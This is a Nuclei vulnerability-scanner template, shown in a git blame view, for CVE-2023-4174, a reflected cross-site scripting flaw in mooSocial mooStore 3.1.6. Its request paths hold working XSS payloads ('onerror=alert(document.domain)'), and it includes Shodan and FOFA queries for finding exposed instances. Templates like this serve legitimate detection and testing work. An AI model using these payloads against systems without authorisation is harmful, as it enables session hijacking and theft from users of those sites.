daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-4174.yaml

62 lines
2.6 KiB
YAML
Raw Permalink Normal View History

re-wrote template
2023-08-08 21:02:42 +00:00
id: CVE-2023-4174
info:
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
author: momika233
severity: medium
description: |
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability.
re-wrote template
2023-08-08 21:02:42 +00:00
reference:
- https://www.exploit-db.com/exploits/51671
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
- https://vuldb.com/?ctiid.236209
- https://vuldb.com/?id.236209
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4174
cwe-id: CWE-79
product/queries updated
2024-05-31 19:23:20 +00:00
epss-score: 0.00302
epss-percentile: 0.69562
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
re-wrote template
2023-08-08 21:02:42 +00:00
metadata:
verified: true
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
max-request: 5
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
vendor: moosocial
product: moostore
product/queries updated
2024-05-31 19:23:20 +00:00
shodan-query: http.favicon.hash:"702863115"
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot:
2024-06-07 10:04:29 +00:00
fofa-query:
- icon_hash="702863115"
- moosocial
auto tagging via templateman
2024-01-14 09:21:50 +00:00
tags: cve,cve2023,packetstorm,moosocial,xss
re-wrote template
2023-08-08 21:02:42 +00:00
http:
- method: GET
path:
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
stop-at-first-match: true
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
re-wrote template
2023-08-08 21:02:42 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>ridxm"
- "mooSocial"
condition: and
- type: word
part: header
words:
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
- "text/html"
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot:
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100982e4b04752783b0200c9e3387496ebf4cda655ed340987b6716d6c6b82cd8e502210097432437c8730b721768f5d5c3a6f5ff991556d4ea5e49f4af55e57a2e72d9eb:922c64590222798bb761d5b6d8e72950